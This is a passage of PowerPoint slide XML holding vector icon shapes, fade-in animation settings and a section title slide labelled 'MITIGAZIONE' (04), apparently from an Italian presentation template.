                  <a:lnTo>
                    <a:pt x="642" y="1803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802" y="643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258" y="1099"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2589" y="871"/>
                    <a:pt x="2983" y="726"/>
                    <a:pt x="3376" y="622"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3376" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="622"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5406" y="726"/>
                    <a:pt x="5779" y="871"/>
                    <a:pt x="6131" y="1099"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4184" y="2735"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2900" y="2735"/>
                    <a:pt x="2258" y="4289"/>
                    <a:pt x="3169" y="5200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4081" y="6111"/>
                    <a:pt x="5634" y="5469"/>
                    <a:pt x="5634" y="4185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5634" y="3377"/>
                    <a:pt x="4992" y="2735"/>
                    <a:pt x="4184" y="2735"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4184" y="2735"/>
                  </a:move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342;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43E2769-32AC-2A80-77ED-A7FD1DA9F114}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1498733" y="2704451"/>
              <a:ext cx="470108" cy="411129"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21792" h="19058" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="19596" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2217" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="995" y="0"/>
                    <a:pt x="1" y="974"/>
                    <a:pt x="1" y="2196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="12719"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="13941"/>
                    <a:pt x="995" y="14935"/>
                    <a:pt x="2217" y="14935"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8121" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8121" y="16675"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8100" y="17359"/>
                    <a:pt x="7665" y="17980"/>
                    <a:pt x="7002" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6091" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5573" y="18249"/>
                    <a:pt x="5573" y="19016"/>
                    <a:pt x="6091" y="19057"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9218" y="19057"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9736" y="19016"/>
                    <a:pt x="9736" y="18249"/>
                    <a:pt x="9218" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8431" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8783" y="17773"/>
                    <a:pt x="8970" y="17234"/>
                    <a:pt x="8970" y="16675"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8970" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12864" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12864" y="16675"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12864" y="17234"/>
                    <a:pt x="13051" y="17773"/>
                    <a:pt x="13403" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12636" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12098" y="18249"/>
                    <a:pt x="12098" y="19016"/>
                    <a:pt x="12636" y="19057"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15743" y="19057"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16261" y="19016"/>
                    <a:pt x="16261" y="18249"/>
                    <a:pt x="15743" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14791" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14128" y="17980"/>
                    <a:pt x="13693" y="17359"/>
                    <a:pt x="13693" y="16675"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13693" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19596" y="14935"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20798" y="14935"/>
                    <a:pt x="21792" y="13941"/>
                    <a:pt x="21792" y="12719"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21792" y="2196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21792" y="974"/>
                    <a:pt x="20818" y="0"/>
                    <a:pt x="19596" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2217" y="850"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19596" y="850"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20342" y="850"/>
                    <a:pt x="20943" y="1450"/>
                    <a:pt x="20943" y="2196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20943" y="11434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="11434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="2196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="850" y="1450"/>
                    <a:pt x="1471" y="850"/>
                    <a:pt x="2217" y="850"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19596" y="14065"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2217" y="14065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1471" y="14065"/>
                    <a:pt x="850" y="13464"/>
                    <a:pt x="850" y="12719"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="850" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20943" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20943" y="12719"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20943" y="13464"/>
                    <a:pt x="20342" y="14086"/>
                    <a:pt x="19596" y="14086"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19596" y="14065"/>
                  </a:move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343;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E919EC5-8BA7-4EAF-BD00-F646E7BA9EB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1640028" y="2737131"/>
              <a:ext cx="198877" cy="199330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9219" h="9240" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="415" y="5863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726" y="5863"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="6070"/>
                    <a:pt x="871" y="6277"/>
                    <a:pt x="974" y="6484"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="767" y="6691"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="6857"/>
                    <a:pt x="601" y="7126"/>
                    <a:pt x="767" y="7292"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1927" y="8452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="8618"/>
                    <a:pt x="2362" y="8618"/>
                    <a:pt x="2528" y="8452"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2735" y="8245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2942" y="8349"/>
                    <a:pt x="3149" y="8431"/>
                    <a:pt x="3356" y="8494"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3356" y="8804"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3356" y="9032"/>
                    <a:pt x="3543" y="9239"/>
                    <a:pt x="3791" y="9239"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5428" y="9239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5656" y="9239"/>
                    <a:pt x="5842" y="9032"/>
                    <a:pt x="5842" y="8804"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5842" y="8494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6070" y="8431"/>
                    <a:pt x="6277" y="8349"/>
                    <a:pt x="6464" y="8245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6691" y="8452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6857" y="8618"/>
                    <a:pt x="7126" y="8618"/>
                    <a:pt x="7292" y="8452"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8452" y="7292"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8618" y="7126"/>
                    <a:pt x="8618" y="6857"/>
                    <a:pt x="8452" y="6691"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8224" y="6484"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8328" y="6277"/>
                    <a:pt x="8411" y="6070"/>
                    <a:pt x="8494" y="5863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8804" y="5863"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9032" y="5863"/>
                    <a:pt x="9219" y="5676"/>
                    <a:pt x="9219" y="5428"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9219" y="3791"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9219" y="3564"/>
                    <a:pt x="9032" y="3377"/>
                    <a:pt x="8804" y="3377"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8494" y="3377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8411" y="3170"/>
                    <a:pt x="8328" y="2963"/>
                    <a:pt x="8224" y="2756"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8431" y="2549"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8597" y="2362"/>
                    <a:pt x="8597" y="2093"/>
                    <a:pt x="8431" y="1927"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7292" y="788"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7106" y="601"/>
                    <a:pt x="6857" y="601"/>
                    <a:pt x="6691" y="788"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6464" y="995"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6256" y="891"/>
                    <a:pt x="6049" y="809"/>
                    <a:pt x="5842" y="746"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5842" y="436"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5842" y="187"/>
                    <a:pt x="5656" y="1"/>
                    <a:pt x="5407" y="1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3791" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3543" y="1"/>
                    <a:pt x="3356" y="187"/>
                    <a:pt x="3356" y="436"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3356" y="746"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3149" y="809"/>
                    <a:pt x="2942" y="891"/>
                    <a:pt x="2735" y="995"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2528" y="788"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2362" y="601"/>
                    <a:pt x="2093" y="601"/>
                    <a:pt x="1927" y="788"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="767" y="1927"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="2093"/>
                    <a:pt x="601" y="2362"/>
                    <a:pt x="767" y="2549"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="974" y="2756"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="2963"/>
                    <a:pt x="788" y="3170"/>
                    <a:pt x="726" y="3377"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="415" y="3377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="3377"/>
                    <a:pt x="1" y="3564"/>
                    <a:pt x="1" y="3791"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="5428"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5676"/>
                    <a:pt x="187" y="5863"/>
                    <a:pt x="415" y="5863"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="850" y="4247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1057" y="4247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1244" y="4247"/>
                    <a:pt x="1430" y="4102"/>
                    <a:pt x="1471" y="3895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1554" y="3543"/>
                    <a:pt x="1699" y="3211"/>
                    <a:pt x="1886" y="2901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="2735"/>
                    <a:pt x="1948" y="2528"/>
                    <a:pt x="1824" y="2383"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1679" y="2238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2238" y="1699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="1844"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2507" y="1969"/>
                    <a:pt x="2735" y="1989"/>
                    <a:pt x="2901" y="1906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3191" y="1699"/>
                    <a:pt x="3522" y="1575"/>
                    <a:pt x="3874" y="1492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4081" y="1451"/>
                    <a:pt x="4206" y="1264"/>
                    <a:pt x="4206" y="1078"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4206" y="871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4993" y="871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4993" y="1078"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4993" y="1264"/>
                    <a:pt x="5117" y="1451"/>
                    <a:pt x="5324" y="1492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5676" y="1575"/>
                    <a:pt x="6008" y="1699"/>
                    <a:pt x="6298" y="1906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6464" y="2010"/>
                    <a:pt x="6691" y="1969"/>
                    <a:pt x="6816" y="1844"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6961" y="1699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7520" y="2238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7375" y="2383"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7251" y="2528"/>
                    <a:pt x="7230" y="2735"/>
                    <a:pt x="7313" y="2901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7520" y="3211"/>
                    <a:pt x="7644" y="3543"/>
                    <a:pt x="7727" y="3895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7769" y="4081"/>
                    <a:pt x="7955" y="4226"/>
                    <a:pt x="8141" y="4226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8349" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8349" y="5014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8141" y="5014"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7955" y="5014"/>
                    <a:pt x="7769" y="5138"/>
                    <a:pt x="7727" y="5345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7644" y="5676"/>
                    <a:pt x="7520" y="6029"/>
                    <a:pt x="7313" y="6319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7230" y="6484"/>
                    <a:pt x="7251" y="6712"/>
                    <a:pt x="7375" y="6836"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7520" y="6981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6961" y="7541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6816" y="7396"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6691" y="7251"/>
                    <a:pt x="6464" y="7230"/>
                    <a:pt x="6298" y="7334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6008" y="7520"/>
                    <a:pt x="5676" y="7665"/>
                    <a:pt x="5324" y="7748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5117" y="7789"/>
                    <a:pt x="4993" y="7955"/>
                    <a:pt x="4993" y="8162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4993" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206" y="8183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4206" y="7976"/>
                    <a:pt x="4081" y="7810"/>
                    <a:pt x="3874" y="7769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3522" y="7686"/>
                    <a:pt x="3191" y="7541"/>
                    <a:pt x="2901" y="7354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2735" y="7251"/>
                    <a:pt x="2507" y="7271"/>
                    <a:pt x="2383" y="7396"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2238" y="7541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679" y="7002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1824" y="6857"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1948" y="6712"/>
                    <a:pt x="1989" y="6505"/>
                    <a:pt x="1886" y="6339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="6029"/>
                    <a:pt x="1554" y="5697"/>
                    <a:pt x="1471" y="5345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1430" y="5138"/>
                    <a:pt x="1244" y="5014"/>
                    <a:pt x="1057" y="5014"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="850" y="5014"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="850" y="4247"/>
                  </a:move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344;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE799478-DB54-435D-287B-9B60F603038D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1696047" y="2784661"/>
              <a:ext cx="94293" cy="94315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4371" h="4372" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1864" y="4371"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3542" y="4371"/>
                    <a:pt x="4371" y="2362"/>
                    <a:pt x="3190" y="1181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2009" y="1"/>
                    <a:pt x="0" y="850"/>
                    <a:pt x="0" y="2507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3543"/>
                    <a:pt x="849" y="4371"/>
                    <a:pt x="1864" y="4371"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1864" y="1492"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2776" y="1492"/>
                    <a:pt x="3231" y="2590"/>
                    <a:pt x="2589" y="3232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="3853"/>
                    <a:pt x="849" y="3418"/>
                    <a:pt x="849" y="2507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="849" y="1948"/>
                    <a:pt x="1305" y="1492"/>
                    <a:pt x="1864" y="1492"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1864" y="1492"/>
                  </a:move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345;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3257E0BE-1BD7-ECBB-82B4-5B7E89F17060}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1707200" y="2980841"/>
              <a:ext cx="58116" cy="20559"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2694" h="953" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2072" y="41"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="622" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="953"/>
                    <a:pt x="622" y="891"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2072" y="891"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2694" y="953"/>
                    <a:pt x="2694" y="0"/>
                    <a:pt x="2072" y="41"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2072" y="41"/>
                  </a:move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346;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A2D64C-A8A6-24A0-3074-04227E44C492}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1724199" y="3099684"/>
              <a:ext cx="21465" cy="21486"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="995" h="996" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="559" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="1"/>
                    <a:pt x="0" y="457"/>
                    <a:pt x="249" y="726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="518" y="995"/>
                    <a:pt x="994" y="809"/>
                    <a:pt x="994" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="994" y="187"/>
                    <a:pt x="808" y="1"/>
                    <a:pt x="559" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="559" y="1"/>
                  </a:move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8499014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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="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4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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4">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="44"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Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
            <a:ext cx="4647851" cy="194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9300">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MITIGAZIONE</a:t>
            </a:r>
            <a:endParaRPr sz="9300">
              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Elemento grafico 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CDCFAFC-09B0-D5D0-D155-CC79672D2F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7594" y="1046755"/>
            <a:ext cx="3049990" cy="3049990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3876210034"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cove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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
